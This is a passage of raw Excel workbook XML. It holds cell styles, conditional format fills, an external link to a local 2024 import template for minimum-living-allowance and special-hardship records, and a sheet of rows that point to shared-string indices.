      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="20" fillId="4" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="91" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="75" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="91" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="9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20% - 强调文字颜色 1 10 2 3" xfId="49"/>
    <cellStyle name="40% - 强调文字颜色 1 6 2" xfId="50"/>
    <cellStyle name="40% - 强调文字颜色 2 11 2 3" xfId="51"/>
    <cellStyle name="差 25 3 4" xfId="52"/>
    <cellStyle name="20% - 强调文字颜色 3 12 2 2 2 3" xfId="53"/>
    <cellStyle name="40% - 强调文字颜色 6 11 3 2 4" xfId="54"/>
    <cellStyle name="检查单元格 8 3" xfId="55"/>
    <cellStyle name="常规 11 14 3 2 4" xfId="56"/>
    <cellStyle name="20% - 强调文字颜色 6 16 3 3" xfId="57"/>
    <cellStyle name="60% - 强调文字颜色 4 18 2" xfId="58"/>
    <cellStyle name="60% - 强调文字颜色 1 4 2 2" xfId="59"/>
    <cellStyle name="标题 3 16 2 2 2 3" xfId="60"/>
    <cellStyle name="常规 31 9 12 3" xfId="61"/>
    <cellStyle name="注释 3 3 3" xfId="62"/>
    <cellStyle name="注释 8 2 2 2 2" xfId="63"/>
    <cellStyle name="链接单元格 12 2 2 3" xfId="64"/>
    <cellStyle name="常规 9 11 2 2 2" xfId="65"/>
    <cellStyle name="60% - 强调文字颜色 3 24" xfId="66"/>
    <cellStyle name="常规 4 17 5 2 2" xfId="67"/>
    <cellStyle name="标题 3 14 2 2" xfId="68"/>
    <cellStyle name="样式 1 2 3 3 2 2" xfId="69"/>
    <cellStyle name="常规 10" xfId="70"/>
    <cellStyle name="常规 11" xfId="71"/>
    <cellStyle name="常规 10 23 2 2" xfId="72"/>
    <cellStyle name="链接单元格 18" xfId="73"/>
    <cellStyle name="输入 16 3 2" xfId="74"/>
    <cellStyle name="常规 20" xfId="75"/>
    <cellStyle name="适中 8" xfId="76"/>
    <cellStyle name="警告文本 26 2 2" xfId="77"/>
    <cellStyle name="常规_Sheet1" xfId="78"/>
    <cellStyle name="强调文字颜色 3 9 3 2" xfId="79"/>
    <cellStyle name="样式 1 5 3 2 2" xfId="80"/>
    <cellStyle name="常规 3" xfId="81"/>
    <cellStyle name="注释 10 3 3" xfId="82"/>
    <cellStyle name="常规 4" xfId="83"/>
    <cellStyle name="注释 18 2 3" xfId="84"/>
    <cellStyle name="常规 14" xfId="85"/>
    <cellStyle name="注释 5 4" xfId="86"/>
    <cellStyle name="注释 24 2 2" xfId="87"/>
    <cellStyle name="注释 8 2 2" xfId="88"/>
    <cellStyle name="常规 24" xfId="89"/>
    <cellStyle name="常规 6 2 2" xfId="90"/>
    <cellStyle name="常规 16" xfId="91"/>
  </cellStyles>
  <dxfs count="2">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFF9900"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFF9900"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="00FFFFFF"/>
      <color rgb="00FF0000"/>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min\Desktop\&#25937;&#21161;&#31995;&#32479;\2024\2024.2\&#20302;&#20445;&#29305;&#22256;&#23548;&#20837;&#25968;&#25454;&#27169;&#26495;@20240126.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低保特困数据-导入模板"/>
      <sheetName val="选项"/>
      <sheetName val="区划代码查询表"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2"/>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B1:C142"/>
  <sheetViews>
    <sheetView showFormulas="1" topLeftCell="G1" workbookViewId="0">
      <selection activeCell="J6" sqref="J6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="19.25" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" customWidth="1"/>
    <col min="3" max="3" width="31.875" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="9" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:3">
      <c r="B1" t="s">
        <v>0</v>
      </c>
      <c r="C1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" customHeight="1" spans="2:3">
      <c r="B2" t="s">
        <v>2</v>
      </c>
      <c r="C2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" customHeight="1" spans="2:3">
      <c r="B3" t="s">
        <v>2</v>
      </c>
      <c r="C3" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" customHeight="1" spans="2:3">
      <c r="B4" t="s">
        <v>2</v>
      </c>
      <c r="C4" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" customHeight="1" spans="2:3">
      <c r="B5" t="s">
        <v>2</v>
      </c>
      <c r="C5" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="2:3">
      <c r="B6" t="s">
        <v>2</v>
      </c>
      <c r="C6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" customHeight="1" spans="2:3">
      <c r="B7" t="s">
        <v>2</v>
      </c>
      <c r="C7" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:3">
      <c r="B8" t="s">
        <v>2</v>
      </c>
      <c r="C8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:3">
      <c r="B9" t="s">
        <v>2</v>
      </c>
      <c r="C9" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="2:3">
      <c r="B10" t="s">
        <v>2</v>
      </c>
      <c r="C10" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="2:3">
      <c r="B11" t="s">
        <v>2</v>
      </c>
      <c r="C11" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="2:3">
      <c r="B12" t="s">
        <v>2</v>
      </c>
      <c r="C12" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="2:3">
      <c r="B13" t="s">
        <v>14</v>
      </c>
      <c r="C13" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:3">
      <c r="B14" t="s">
        <v>16</v>
      </c>
      <c r="C14" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="2:3">
      <c r="B15" t="s">
        <v>17</v>
      </c>
      <c r="C15" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="2:3">
      <c r="B16" t="s">
        <v>19</v>
      </c>
      <c r="C16" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:3">
      <c r="B17" t="s">
        <v>20</v>
      </c>
      <c r="C17" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:3">
      <c r="B18" t="s">
        <v>22</v>
      </c>
      <c r="C18" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:3">
      <c r="B19" t="s">
        <v>24</v>
      </c>
      <c r="C19" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:3">
      <c r="B20" t="s">
        <v>25</v>
      </c>
      <c r="C20" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:3">
      <c r="B21" t="s">
        <v>26</v>
      </c>
      <c r="C21" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:3">
      <c r="B22" t="s">
        <v>28</v>
      </c>
      <c r="C22" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:3">
      <c r="B23" t="s">
        <v>30</v>
      </c>
      <c r="C23" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:3">
      <c r="B24" t="s">
        <v>32</v>
      </c>
      <c r="C24" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:3">
      <c r="B25" t="s">
        <v>34</v>
      </c>
      <c r="C25" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:3">
      <c r="B26" t="s">
        <v>36</v>
      </c>
      <c r="C26" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:3">
      <c r="B27" t="s">
        <v>38</v>
      </c>
      <c r="C27" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:3">
      <c r="B28" t="s">
        <v>40</v>
      </c>
      <c r="C28" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="2:3">
      <c r="B29" t="s">
        <v>42</v>
      </c>
      <c r="C29" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="2:3">
      <c r="B30" t="s">
        <v>44</v>
      </c>
      <c r="C30" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="2:3">
      <c r="B31" t="s">
        <v>46</v>
      </c>
      <c r="C31" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="2:3">
      <c r="B32" t="s">
        <v>48</v>
      </c>
      <c r="C32" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="2:3">
      <c r="B33" t="s">
        <v>50</v>
      </c>
      <c r="C33" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="2:3">
      <c r="B34" t="s">
        <v>52</v>
      </c>
      <c r="C34" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="2:3">
      <c r="B35" t="s">
        <v>54</v>
      </c>
      <c r="C35" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="2:3">
      <c r="B36" t="s">
        <v>55</v>
      </c>
      <c r="C36" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="2:3">
      <c r="B37" t="s">
        <v>57</v>
      </c>
      <c r="C37" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="2:3">
      <c r="B38" t="s">
        <v>59</v>
      </c>
      <c r="C38" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="2:3">
      <c r="B39" t="s">
        <v>61</v>
      </c>
      <c r="C39" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="2:3">
      <c r="B40" t="s">
        <v>63</v>
      </c>
      <c r="C40" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="2:3">
      <c r="B41" t="s">
        <v>65</v>
      </c>
      <c r="C41" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="2:3">
      <c r="B42" t="s">
        <v>67</v>
      </c>
      <c r="C42" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="2:3">
      <c r="B43" t="s">
        <v>69</v>
      </c>
      <c r="C43" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="2:3">
      <c r="B44" t="s">
        <v>71</v>
      </c>
      <c r="C44" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="2:3">
      <c r="B45" t="s">
        <v>73</v>
      </c>
      <c r="C45" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="2:3">
      <c r="B46" t="s">
        <v>75</v>
      </c>
      <c r="C46" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="2:3">
      <c r="B47" t="s">
        <v>77</v>
      </c>
      <c r="C47" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="2:3">
      <c r="B48" t="s">
        <v>79</v>
      </c>
      <c r="C48" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="2:3">
      <c r="B49" t="s">
        <v>81</v>
      </c>
      <c r="C49" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="2:3">
      <c r="B50" t="s">
        <v>83</v>
      </c>
      <c r="C50" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="2:3">
      <c r="B51" t="s">
        <v>85</v>
      </c>
      <c r="C51" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="2:3">
      <c r="B52" t="s">
        <v>87</v>
      </c>
      <c r="C52" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="2:3">
      <c r="B53" t="s">
        <v>89</v>
      </c>
      <c r="C53" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="2:3">
      <c r="B54" t="s">
        <v>91</v>
      </c>
      <c r="C54" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="2:3">
      <c r="B55" t="s">
        <v>93</v>
      </c>
      <c r="C55" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="2:3">
      <c r="B56" t="s">
        <v>95</v>
      </c>
      <c r="C56" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="2:3">
      <c r="B57" t="s">
        <v>97</v>
      </c>
      <c r="C57" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="2:3">
      <c r="B58" t="s">
        <v>99</v>
      </c>
      <c r="C58" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="2:3">
      <c r="B59" t="s">
        <v>101</v>
      </c>
      <c r="C59" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="2:3">
      <c r="B60" t="s">
        <v>103</v>
      </c>
      <c r="C60" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="2:3">
      <c r="B61" t="s">
        <v>105</v>
      </c>
      <c r="C61" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="2:3">
      <c r="B62" t="s">
        <v>107</v>
      </c>
      <c r="C62" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="2:3">
      <c r="B63" t="s">
        <v>109</v>
      </c>
      <c r="C63" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="2:3">
      <c r="B64" t="s">
        <v>111</v>
      </c>
      <c r="C64" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="2:3">
      <c r="B65" t="s">
        <v>113</v>
      </c>
      <c r="C65" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="2:3">
      <c r="B66" t="s">
        <v>115</v>
      </c>
      <c r="C66" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="2:3">
      <c r="B67" t="s">
        <v>117</v>
      </c>
      <c r="C67" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="2:3">
      <c r="B68" t="s">
        <v>118</v>
      </c>
      <c r="C68" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="2:3">
      <c r="B69" t="s">
        <v>120</v>
      </c>
      <c r="C69" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="2:3">
      <c r="B70" t="s">
        <v>122</v>
      </c>
      <c r="C70" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="2:3">
      <c r="B71" t="s">
        <v>124</v>
      </c>
      <c r="C71" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="2:3">
      <c r="B72" t="s">
        <v>126</v>
      </c>
      <c r="C72" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="2:3">
      <c r="B73" t="s">
        <v>128</v>
      </c>
      <c r="C73" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="2:3">
      <c r="B74" t="s">
        <v>130</v>
      </c>
      <c r="C74" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="2:3">
      <c r="B75" t="s">
        <v>132</v>
      </c>
      <c r="C75" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" spans="2:3">
      <c r="B76" t="s">
        <v>134</v>
      </c>
      <c r="C76" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="2:3">
      <c r="B77" t="s">
        <v>136</v>
      </c>
      <c r="C77" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="2:3">
      <c r="B78" t="s">
        <v>138</v>
      </c>
      <c r="C78" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="2:3">
      <c r="B79" t="s">
        <v>139</v>
      </c>
      <c r="C79" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="2:3">
      <c r="B80" t="s">
        <v>140</v>
      </c>
      <c r="C80" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="2:3">
      <c r="B81" t="s">
        <v>142</v>
      </c>
      <c r="C81" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="2:3">
      <c r="B82" t="s">
        <v>144</v>
      </c>
      <c r="C82" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="2:3">
      <c r="B83" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="2:3">
      <c r="B84" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="2:3">
      <c r="B85" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="2:3">
      <c r="B86" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="2:3">
      <c r="B87" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="2:3">
      <c r="B88" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="2:3">
      <c r="B89" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="2:3">
      <c r="B90" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="2:3">
      <c r="B91" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="2:3">
      <c r="B92" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="2:3">
      <c r="B93" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="2:3">
      <c r="B94" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="2:3">
      <c r="B95" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="2:3">
      <c r="B96" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="2:2">
      <c r="B97" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="2:2">
      <c r="B98" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="2:2">
      <c r="B99" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="2:2">
      <c r="B100" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="2:2">
      <c r="B101" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="2:2">
      <c r="B102" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="2:2">
      <c r="B103" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="2:2">
      <c r="B104" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="2:2">
      <c r="B105" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="2:2">
      <c r="B106" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="2:2">
      <c r="B107" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="2:2">
      <c r="B108" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="2:2">
      <c r="B109" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="2:2">
      <c r="B110" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="2:2">
      <c r="B111" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="2:2">
      <c r="B112" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="2:2">
      <c r="B113" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="2:2">
      <c r="B114" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="2:2">
      <c r="B115" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="2:2">
      <c r="B116" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="2:2">
      <c r="B117" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="2:2">
      <c r="B118" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="2:2">
      <c r="B119" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="2:2">
      <c r="B120" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="2:2">
      <c r="B121" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="2:2">
      <c r="B122" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="2:2">
      <c r="B123" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="2:2">
      <c r="B124" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="2:2">
      <c r="B125" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="2:2">
      <c r="B126" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="2:2">
      <c r="B127" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="2:2">
      <c r="B128" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="2:2">
      <c r="B129" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="2:2">
      <c r="B130" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="2:2">
      <c r="B131" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="2:2">
      <c r="B132" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="2:2">
      <c r="B133" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="2:2">
      <c r="B134" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="2:2">
      <c r="B135" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="2:2">
      <c r="B136" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="2:2">
      <c r="B137" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="2:2">
      <c r="B138" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="139" customHeight="1" spans="2:2">
      <c r="B139" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="140" customHeight="1" spans="2:2">
      <c r="B140" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="141" customHeight="1" spans="2:2">
      <c r="B141" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="142" customHeight="1" spans="2:2">
      <c r="B142" t="s">
        <v>205</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" firstPageNumber="4294963191" orientation="portrait" useFirstPageNumber="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XEW2659"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane xSplit="13" ySplit="4" topLeftCell="O5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="S7" sqref="S7"/>
    </sheetView>
  </sheetViews>
